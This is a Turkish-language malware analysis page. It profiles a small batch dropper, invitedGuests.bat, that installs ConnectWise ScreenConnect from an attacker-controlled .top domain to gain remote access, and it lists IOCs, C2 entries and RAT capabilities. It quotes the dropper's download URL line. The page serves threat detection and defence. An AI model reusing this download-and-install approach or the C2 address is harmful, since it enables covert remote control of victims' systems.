Manuel Statik Analiz — ScreenConnect/ConnectWise RAT Kötüye Kullanımı | Tehdit: YUKSEK

Dosya Kimliği

SHA256e1cd006efa2d33191052b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2a1
Dosya AdıinvitedGuests.bat ("davet edilen misafirler" sosyal mühendislik)
Boyut1.052 byte (1KB!) — ultra küçük batch script
String Sayisi23

C2 Kontrollü ScreenConnect Kurulumu

LOLBAS Teknik: Meşru uzaktan destek yazılımını silah haline getirme!
set "MY_URL=https://admin.hbdhfijnsgjnds.top/Bin/ScreenConnect.ClientSetup.msi?e=Acce..."
-- hbdhfijnsgjnds.top = 13 karakter rastgele .top TLD (C2 server)
-- admin.* = yönetici panel subdomain
-- /Bin/ScreenConnect.ClientSetup.msi = ConnectWise kurulum paketi
-- ?e=Access → kurulum parametresi (özel erişim grubu)
-- BAT → MSI indir → ConnectWise kur → saldırgana tam erişim!

Meşru RMM Kötüye Kullanımı

ConnectWise ScreenConnect, meşru bir uzaktan yönetim aracıdır (RMM). Saldırganlar bu tür araçları kendi sunucularından yükletip kurumsal sistemlere kalıcı uzaktan erişim sağlar. Antivirüsler meşru RMM araçlarını genellikle tehdit olarak işaretlemez. CVE-2024-1709 (CVSS 10.0) gibi kritik açıklar keşfedildi.

IOC

SHA256e1cd006efa2d33191052b3c5a4f7d0e2b6c9f1a3d6e8b1c4f7a0d3e6b9c2a1
C2admin.hbdhfijnsgjnds.top (.top TLD)
DosyainvitedGuests.bat (1052 byte)

ScreenConnect — Malware Profili

ScreenConnect ConnectWise meşru RMM araç kötüye kullanımı. invitedGuests.bat. BAT dropper + MSI kurulum.

Malware Tipi
RAT
Programlama Dili
Proprietary
C2 Protokolü
HTTPS
Hedef Sistemler
Küresel Kurumsal

Yetenekler ve Davranış

Uzaktan Erişim & Kontrol
Keylogger
Ekran Görüntüsü
Webcam Erişimi
Dosya Yönetimi
Süreç Yönetimi
Komut Yürütme
Kalıcılık Mekanizması

IOC Listesi (1 gösterge)

IOC — ScreenConnect
# DOMAIN hbdhfijnsgjnds.top
TürDeğerNot
domain hbdhfijnsgjnds.top

C2 Sunucuları (Bu aile için 2 kayıtlı sunucu)

Adres Tür Port Protokol Durum Ülke
hbdhfijnsgjnds.top domain 443 HTTPS inactive —
hbdhfijnsgjnds.top domain 443 HTTPS inactive —

C2 adresleri yalnızca KEYDAL ekibinin manuel olarak doğruladığı malware örnekleri üzerinden sunulmaktadır. Ticari amaçla kullanılamaz.

Etiketler
screenconnectconnectwiseinvitedguests-bathbdhfijnsgjnds-toptop-tldrmm-abuse1052-byte-batlegitimate-tool-abuse